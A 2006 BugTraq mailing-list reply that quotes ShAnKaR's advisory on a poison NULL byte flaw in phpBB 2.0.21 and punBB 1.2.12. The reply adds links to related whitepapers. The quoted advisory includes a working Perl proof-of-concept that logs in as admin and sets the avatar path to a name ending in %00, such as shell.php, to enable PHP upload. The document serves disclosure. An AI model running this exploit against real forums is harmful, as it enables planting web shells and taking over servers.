BugTraq
ShAnKaR: multiple PHP application poison NULL byte vulnerability Sep 11 2006 09:33PM
3APA3A (3APA3A SECURITY NNOV RU) (1 replies)
Re: ShAnKaR: multiple PHP application poison NULL byte vulnerability Sep 12 2006 11:58AM
Jerome Athias (jerome athias free fr)
Hi,

this was also nicely described for ASP by Brett Moore
http://www.security-assessment.com/Whitepapers/0x00_vs_ASP_File_Uploads.
pdf

(French translation :
https://www.securinfos.info/jerome/DOC/0x00_vs_ASP_File_Uploads_FR.pdf )

Best regards
/JA

3APA3A a écrit :
> Author: ShAnKaR
> Title: multiple PHP application poison NULL byte vulnerability
> Applications: phpBB 2.0.21, punBB 1.2.12
> Threat Level: Critical
> Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html
>
> Poison NULL byte vulnerability for perl CGI applications was described
> in [1]. ShAnKaR noted, that same vulnerability also affects different
> PHP applications. An example of vulnerable applications are phpBB and
> punBB.
>
> Vulnerability can be used to upload or replace arbitrary files on
> server, e.g. PHP scripts, by adding "poison NULL" (%00) to filename.
>
> In case of phpBB and punBB vulnerability can be exploited by changing
> location of avatar file and uploading avatar file with PHP code in EXIF
> data.
>
> A PoC exploit to change Avatar file location for phpBB:
>
>
>
> #!/usr/bin/perl -w
>
> use HTTP::Cookies;
> use LWP;
> use URI::Escape;
> unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
> my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
> $ua->cookie_jar( HTTP::Cookies->new());
>
> $url='http://'.$ARGV[0].'/login.php';
> $data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
> my $req = new HTTP::Request 'POST',$url;
> $req->content_type('application/x-www-form-urlencoded');
> $req->content($data);
> my $res = $ua->request($req);
>
> $res=$ua->get('http://'.$ARGV[0].'/login.php');
> $content=$res->content;
> $content=~ m/true&sid=([^"]+)"/g;
> if($ARGV[4]){
> $content=$res->content;
> print $content;
> }
> $url='http://'.$ARGV[0].'/login.php';
> $data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
> $req = new HTTP::Request 'POST',$url;
> $req->content_type('application/x-www-form-urlencoded');
> $req->content($data);
> $res = $ua->request($req);
>
> $url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
> $data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
> $req = new HTTP::Request 'POST',$url;
> $req->content_type('application/x-www-form-urlencoded');
> $req->content($data);
> $res = $ua->request($req);
> if($ARGV[4]){
> $content=$res->content;
> print $content;
> }
>
>
> References:
> [1] .rain.forest.puppy, Perl CGI problems, Phrack Magazine Issue 55
>
>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus